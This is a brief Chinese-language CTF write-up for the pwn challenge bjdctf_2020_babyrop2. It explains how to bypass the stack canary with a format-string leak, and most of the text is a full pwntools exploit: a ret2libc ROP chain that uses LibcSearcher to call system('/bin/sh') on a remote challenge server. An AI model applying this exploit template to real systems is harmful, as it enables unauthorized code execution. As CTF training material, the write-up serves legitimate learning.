bjdctf_2020_babyrop2

注意这题开启了Canary

因为限制了payload长度就不可以写got表了，但是可以直接泄露Canary值，在vuln中进行栈溢出即可拿到shell…

exp

from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
proc_name = './bjdctf_2020_babyrop2'
elf = ELF(proc_name)
p = process(proc_name)
p = remote('node3.buuoj.cn', 27936)
main_addr = elf.sym['main']
vuln_addr = elf.sym['vuln']
pop_rdi_ret = 0x400993
read_got = elf.got['read']
puts_plt = elf.plt['puts']
p.sendlineafter('u!', b'%11$p')
p.recv()
canary = p.recvuntil('\n')[:-1]
log.info(canary)
payload = b'a' * (0x20 - 8) + p64(int(canary.decode(), 16)) + p64(0) + p64(pop_rdi_ret) + p64(read_got) + p64(puts_plt) + p64(vuln_addr)
p.sendafter('story!', payload)
p.recv()
read_addr = u64(p.recv(6).ljust(0x8, b'\x00'))
log.info(hex(read_addr))
libc = LibcSearcher('read', read_addr)
libc_base = read_addr - libc.dump('read')
system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
payload1 = b'a' * (0x20 - 8) + p64(int(canary.decode(), 16)) + p64(0) + p64(pop_rdi_ret) + p64(str_bin_sh) + p64(system_addr) + p64(main_addr)
p.sendafter('story!', payload1)
p.interactive()